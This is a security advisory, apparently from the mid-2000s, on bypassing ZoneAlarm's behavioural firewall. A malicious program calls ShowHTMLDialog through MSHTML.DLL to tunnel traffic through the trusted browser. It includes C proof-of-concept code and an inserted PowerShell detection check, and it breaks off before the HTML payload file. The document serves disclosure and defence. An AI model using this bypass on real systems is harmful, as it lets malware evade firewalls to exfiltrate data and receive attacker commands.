Zone Labs Products Advance Program Control and OS Firewall (Behavioral
Based) Technology Bypass Vulnerability
I. PRODUCT BACKGROUND
ZoneAlarm Pro and ZoneAlarm Internet Security Suite add a new level of
protection that Zone Labs calls an "OS Firewall", based on "Behavior Based
Analysis". It goes beyond network-level protection and protects PCs against
various local attacks on a Windows machine. Currently available personal
firewalls protect PCs only against network-based attacks, whereas the new
Zone Labs "OS Firewall" technology monitors activity at the kernel level and
prevents attacks at various levels. The new approach alerts the user by
closely monitoring, at kernel level, any unusual activity in the system, such
as changes to critical registry keys, changes to start-up entries, any kind of
interprocess interaction, and processes making outbound connections via other
trusted programs. When ZoneAlarm sees unusual activity between applications,
it can put the kibosh on memory being read, or quash unauthorized driver and
service loading. The PoC below discusses how the ZoneAlarm Advance Program
Control and Behavior Based Technology can be defeated by using an HTML Modal
Dialog Box.
II. TECHNICAL DESCRIPTION
Zone Alarm products with Advance Program Control or OS Firewall Technology
enabled detect and block almost all of the APIs (such as Shell,
ShellExecuteEx, SetWindowText, SetDlgItem, etc.) that are commonly used by
malicious programs to send data via HTTP by piggybacking over other trusted
programs. However, it is still possible for a malicious program (a Trojan or
worm, etc.) to make outbound connections to the evil site by piggybacking
over the trusted Internet browser using an "HTML Modal Dialog" in conjunction
with simple "JavaScript". Here it is assumed that the default browser (IE or
Firefox, etc.) is authorized to access the Internet. In the default
installation of ZoneAlarm Pro, IE is allowed to access the Internet by
default. The PoC (Proof-of-Concept) in Section V explains the hack, and the
exploit code is also included for reference.
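The bypass depends on the malicious process itself hosting MSHTML.DLL and calling ShowHTMLDialog in-process, so a non-browser process with mshtml.dll mapped is the observable artifact. The PowerShell check below is an added defensive example, not part of this advisory; it lists such processes and skips an allow-list of known MSHTML hosts. The allow-list contents and output fields are assumptions, and results need baselining because many legitimate applications embed the MSHTML control.

```powershell
# Added example (not from the advisory): find processes that have MSHTML.DLL
# loaded but are not known MSHTML hosts. Run on the Windows host being checked.
# The allow-list is an assumption; tune it to what your baseline shows.
$knownHosts = @('iexplore', 'explorer', 'mshta', 'msiexec', 'outlook', 'winword', 'excel')

function Get-MshtmlHosts {
    param([string[]]$AllowList = $knownHosts)
    Get-Process | ForEach-Object {
        $proc = $_
        try {
            # .Modules throws for processes we cannot open (protected, other session,
            # or a 32/64-bit mismatch); skip those rather than abort the sweep.
            $mshtml = $proc.Modules | Where-Object { $_.ModuleName -ieq 'mshtml.dll' }
        } catch {
            return
        }
        if ($mshtml -and ($AllowList -notcontains $proc.ProcessName.ToLower())) {
            [PSCustomObject]@{
                ProcessName = $proc.ProcessName
                PID         = $proc.Id
                ImagePath   = $proc.Path
                MshtmlPath  = $mshtml.FileName
            }
        }
    }
}

Get-MshtmlHosts | Format-Table -AutoSize
```

Processes that could not be opened are silently skipped, so run it elevated to cover services and other users' sessions.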
III. IMPACT
On successful exploitation, the malicious program will be able to send the
victim's details and personal system information to the attacker, and this
can further lead to complete system compromise.
IV. AFFECTED PRODUCTS
Zone Alarm Pro 6.0.x
Zone Alarm Internet Security Suite 6.0.x
Zone Alarm Firewall with Anti-Spyware 6.1.x
Zone Alarm Firewall with Anti-Virus 6.0.x
Zone Alarm Firewall (Free Version) 6.0.x
V. PROOF-OF-CONCEPT:
By using the ShowHTMLDialog() method, it is possible for any malicious
program to create a modal dialog box that displays HTML. This in turn can be
used to redirect the page to the attacker's site. It is observed that, using
this method, ZA Pro and Internet Security Suite are unable to block Internet
access. This method can be used by any malicious program to send data out via
HTTP to the attacker and, at the same time, to receive command instructions
from the attacker. The detailed exploit code is given below:
<<< osfwbypass-demo.c >>>
#include <windows.h>
#include <mshtmhst.h>   // SHOWHTMLDIALOGFN
#include <urlmon.h>     // CreateURLMoniker (link with urlmon.lib)

// Build as C++ (IMoniker::Release below is C++ syntax); in plain C use
// IMoniker_Release(pURLMoniker) with COBJMACROS defined instead.
BOOL LoadHtmlDialog(void)
{
    HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));
    if (hinstMSHTML)
    {
        SHOWHTMLDIALOGFN* pfnShowHTMLDialog;
        // Open a Modal Dialog box of HTML content type
        // (GetProcAddress takes an ANSI name, so no TEXT() macro here)
        pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML,
                                                              "ShowHTMLDialog");
        if (pfnShowHTMLDialog)
        {
            IMoniker *pURLMoniker = NULL;
            // Invoke the html file containing the data to be sent via http
            BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
            if (bstrURL && SUCCEEDED(CreateURLMoniker(NULL, bstrURL, &pURLMoniker)))
            {
                (*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
                pURLMoniker->Release();
            }
            SysFreeString(bstrURL);
        }
        FreeLibrary(hinstMSHTML);
    }
    return TRUE;
}
<<< +++ >>>
<<< modal-dialog.htm >>>